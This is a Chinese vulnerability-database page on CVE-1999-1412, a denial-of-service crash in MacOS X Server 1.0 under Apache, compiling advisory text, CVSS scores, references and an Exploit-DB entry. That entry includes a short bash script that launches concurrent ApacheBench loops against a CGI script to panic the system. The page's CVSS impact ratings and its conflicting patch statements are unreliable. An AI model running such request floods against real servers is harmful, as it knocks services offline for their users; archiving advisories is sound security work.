CVE-1999-1412
CVSS10.0
发布时间 :1999-06-03 00:00:00
修订时间 :2008-09-05 16:19:27
NMCOES    

[原文]A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.


[CNNVD]MacOS X服务器超载漏洞(CNNVD-199906-009)

        苹果电脑公司MacOS X版本1.0和Apache HTTP服务器之间某种可能的交互操作使得远程攻击者可以借助大量到可产生大量进程的CGI程序的HTTP GET请求导致拒绝服务(崩溃)。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:apache:http_serverApache Software Foundation Apache HTTP Server
cpe:/o:apple:mac_os_x:10.0Apple Mac OS X 10.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1412
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1412
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199906-009
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/14215
(VENDOR_ADVISORY)  BUGTRAQ  19990603 MacOS X system panic with CGI
http://www.securityfocus.com/bid/306
(UNKNOWN)  BID  306

- 漏洞信息

MacOS X服务器超载漏洞
危急 未知
1999-06-03 00:00:00 2007-02-08 00:00:00
远程※本地  
        苹果电脑公司MacOS X版本1.0和Apache HTTP服务器之间某种可能的交互操作使得远程攻击者可以借助大量到可产生大量进程的CGI程序的HTTP GET请求导致拒绝服务(崩溃)。

- 公告与补丁

        Apple released a patch on July 20, 1999, which is available for download at:
        http://asu.info.apple.com/swupdates.nsf/artnum/n11355

- 漏洞信息 (19244)

Apple Mac OS X Server 10.0 Overload Vulnerability (EDBID:19244)
osX local
1999-06-03 Verified
0 Juergen Schmidt
N/A [点击下载]
source: http://www.securityfocus.com/bid/306/info

A vulnerability in the MacOS X Server may crash it while under heavy load.

The vulnerability appears while stress testing a server running the Apache web server and 32 or more process are concurntly doing HTTP GET request to a CGI script in a loop. The system will panic and display a stack trace with ipc_task_init.

Although the vulnerability is not related to web servering it can only be reproduced so far using this means.


#!/bin/bash
#
# CGI-McPanic: script to crash MacOS X with 
#              concurrent calls to a CGI-Script
#
# before use, do:
# 
# chmod a+x /Local/Library/WebServer/CGI-Executables/test-cgi
#
# then call
#
# bash ./CGI-McPanic
#

NUMPROC=32
i=0

while [ $i -le $NUMPROC ]
do
    i=$[$i + 1]
    ab -t 3600 http://localhost/cgi-bin/test-cgi &
done		

- 漏洞信息

7036
Apple Mac OS X HTTP GET Request DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

Mac OS X contains a flaw that may allow a remote denial of service. The issue is triggered when 32 or more process are concurrently doing HTTP GET requests to a CGI script in a loop, and will result in loss of availability for the platform.

- 时间线

1999-06-03 Unknow
1999-06-03 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

MacOS X Server Overload Vulnerability
Unknown 306
Yes Yes
1999-06-03 12:00:00 2009-07-11 12:16:00
This vulnerability was published in the BUGTRAQ mailing list on June 3, 1999 by Juergen Schmidt <ju@ct.heise.de>. Solution pointed out to SecurityFocus on July 21, 1999 by Iain Collins <icollins@scotland.net>.

- 受影响的程序版本

Apple Mac OS X Server 10.0

- 漏洞讨论

A vulnerability in the MacOS X Server may crash it while under heavy load.

The vulnerability appears while stress testing a server running the Apache web server and 32 or more process are concurntly doing HTTP GET request to a CGI script in a loop. The system will panic and display a stack trace with ipc_task_init.

Although the vulnerability is not related to web servering it can only be reproduced so far using this means.

- 漏洞利用

x

- 解决方案

Apple released a patch on July 20, 1999, which is available for download at:
http://asu.info.apple.com/swupdates.nsf/artnum/n11355

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站